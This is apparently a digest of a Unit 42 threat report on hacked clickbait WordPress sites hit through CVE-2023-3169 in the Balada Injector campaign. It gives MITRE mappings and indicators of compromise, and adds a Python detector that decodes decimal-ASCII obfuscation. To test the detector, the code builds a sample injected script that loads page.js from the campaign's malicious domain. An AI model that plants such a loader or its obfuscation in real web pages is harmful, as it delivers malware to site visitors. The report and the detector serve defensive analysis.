High Traffic + High Vulnerability = an Attractive Target for Criminals: The Dangers of Viewing Clickbait Sites

Since August 2023, there has been a notable rise in compromised clickbait and ad sites that exploit outdated software to reach a large audience and drive ad revenue. The article explains how these sites operate, the CVE-2023-3169 campaign against WordPress themes, how to detect vulnerable sites, and the defensive protections available from Palo Alto Networks. #CVE-2023-3169 #BaladaInjector #tagDivNewspaper #tagDivNewsmag #WordPress #YoastSEO #MonsterInsights

Key points

  • Rise in compromised clickbait/ad sites since late Aug 2023, driven by their potential reach and use of outdated software.
  • Three traffic-boosting strategies: evergreen topics, content discovery platforms with native ads, and generative AI tooling.
  • Exploitation of CVE-2023-3169 in tagDiv’s Newspaper/Newsmag WordPress themes (with Composer plugin) led to thousands of site compromises.
  • Analysis found ~10,300 compromised WordPress sites over two months, with clickbait/ad sites accounting for a large share; ~80% used the Newspaper theme, ~6% used Newsmag.
  • Injected scripts were obfuscated (decimal ASCII values) and referenced stay.decentralappps.com/src/page.js, linked to the Balada Injector campaign.
  • Indicator-based discovery shows web stack patterns (WordPress, specific plugins) help identify vulnerable sites, enabling exploitation of known CVEs.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to exploit CVE-2023-3169 affecting tagDiv’s Newspaper and Newsmag themes with the WordPress Composer plugin. ‘On Sept. 11, 2023, MITRE published CVE-2023-3169 for a vulnerability affecting tagDiv’s Newspaper and Newsmag themes when used with its Composer plugin for WordPress.’
  • [T1027] Obfuscated/Compressed Files and Information – The obfuscated script uses decimal values representing ASCII characters. ‘This obfuscated script uses decimal values representing ASCII characters. Converting these numbers to ASCII text reveals the malicious script…’
  • [T1071.001] Web Protocols – The decoded script contains a URL to a remote host (stay.decentralappps.com/src/page.js) used to load additional content. ‘The decoded script in Figure 8 contains the same hxxps://stay[.]decentralappps[.]com/src/page.js URL noted in previous reports…’
  • [T1518] Software Discovery – Threat actors use web stack data to determine if a server is running any out-of-date software or applications. ‘Threat actors use web stack data to determine if a server is running any out-of-date software or applications.’
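
The decoding step behind the T1027 entry, as an added detection example (not Unit 42's code): it scans page HTML for long runs of comma-separated decimal byte values, decodes them to ASCII and reports any of the report's IoC domains found in the decoded text. The run-length threshold, the `[...]` wrapper in the sample and the sample page itself are constructed assumptions, not details taken from the campaign.

```python
import re

# IoC domains listed in the report; used only as a defender's match list.
IOC_DOMAINS = {"stay.decentralappps.com", "gofindyou.com"}

# A run of at least nine 1-3 digit decimal values separated by commas.
# The threshold is an assumption chosen to avoid matching ordinary number lists.
DECIMAL_RUN = re.compile(r"(?:\b\d{1,3}\b\s*,\s*){8,}\b\d{1,3}\b")


def decode_decimal_runs(text):
    """Return the ASCII text of every decimal-value run that decodes to printable characters."""
    decoded = []
    for match in DECIMAL_RUN.finditer(text):
        values = [int(n) for n in re.findall(r"\d{1,3}", match.group(0))]
        # Only keep runs that look like text (printable ASCII plus tab/newline/CR).
        if all(32 <= v < 127 or v in (9, 10, 13) for v in values):
            decoded.append("".join(chr(v) for v in values))
    return decoded


def find_iocs(html):
    """Decode obfuscated runs in a page and return the IoC domains they reference."""
    hits = set()
    for text in decode_decimal_runs(html):
        hits.update(domain for domain in IOC_DOMAINS if domain in text)
    return hits


# Constructed sample: a script that loads the remote page.js noted in the report,
# encoded as decimal ASCII values inside a JavaScript array (wrapper is hypothetical).
SAMPLE_PAYLOAD = (
    'var s=document.createElement("script");'
    's.src="https://stay.decentralappps.com/src/page.js";'
    "document.head.appendChild(s);"
)
SAMPLE_HTML = (
    "<html><head><title>Clickbait</title><script>var d=["
    + ",".join(str(ord(c)) for c in SAMPLE_PAYLOAD)
    + "];</script></head><body>Item 1, 2, 3</body></html>"
)

if __name__ == "__main__":
    for text in decode_decimal_runs(SAMPLE_HTML):
        print("decoded:", text)
    print("IoC domains referenced:", sorted(find_iocs(SAMPLE_HTML)))
```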

Indicators of Compromise

  • [Domain] Malicious domains – stay.decentralappps.com, gofindyou.com
  • [URL] Injected/script delivery URL – http(s)://stay.decentralappps.com/src/page.js, http(s)://gofindyou.com/health/what-causes-plaque-psoriasis-heres-what-doctors-need-you-to-know

Read more: https://unit42.paloaltonetworks.com/dangers-of-clickbait-sites/